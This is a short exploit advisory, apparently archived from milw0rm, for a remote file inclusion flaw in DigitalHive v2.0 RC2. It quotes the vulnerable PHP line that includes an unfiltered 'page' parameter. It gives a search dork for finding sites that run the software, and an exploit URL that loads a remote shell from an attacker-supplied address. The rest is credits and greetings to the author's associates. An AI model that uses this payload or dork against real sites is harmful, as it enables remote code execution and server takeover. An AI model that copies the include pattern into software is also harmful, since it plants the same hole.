39 lines
No EOL
1.4 KiB
Text
39 lines
No EOL
1.4 KiB
Text
#==============================================================================================
|
|
#DigitalHive <= v2.0 RC2 (page) Remote File Inclusion Exploit
|
|
#===============================================================================================
|
|
#
|
|
#Critical Level : Dangerous
|
|
#
|
|
#Venedor site : http://www.digitalhive.com/base.php?page=site/telechargements.php&var=accueil
|
|
#
|
|
#Version : v2.0 RC2
|
|
#
|
|
#================================================================================================
|
|
#
|
|
#DORK : "Powered by DigitalHive"
|
|
#
|
|
#================================================================================================
|
|
#Bug in : template/purpletech/base_include.php
|
|
#
|
|
#Vlu Code :
|
|
#--------------------------------
|
|
#
|
|
# <?php include ($_GET["page"]); ?>
|
|
#
|
|
#================================================================================================
|
|
#
|
|
#Exploit :
|
|
#--------------------------------
|
|
#
|
|
#http://sitename.com/[Script Path]/template/purpletech/base_include.php?page=http://SHELLURL?
|
|
#
|
|
#================================================================================================
|
|
#Discoverd By : SHiKaA
|
|
#
|
|
#Conatact : SHiKaA-[at]hotmail.com
|
|
#
|
|
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
|
|
# sPECial THanks to : Coder-AZH@CKTEAM
|
|
==================================================================================================
|
|
|
|
# milw0rm.com [2006-10-15] |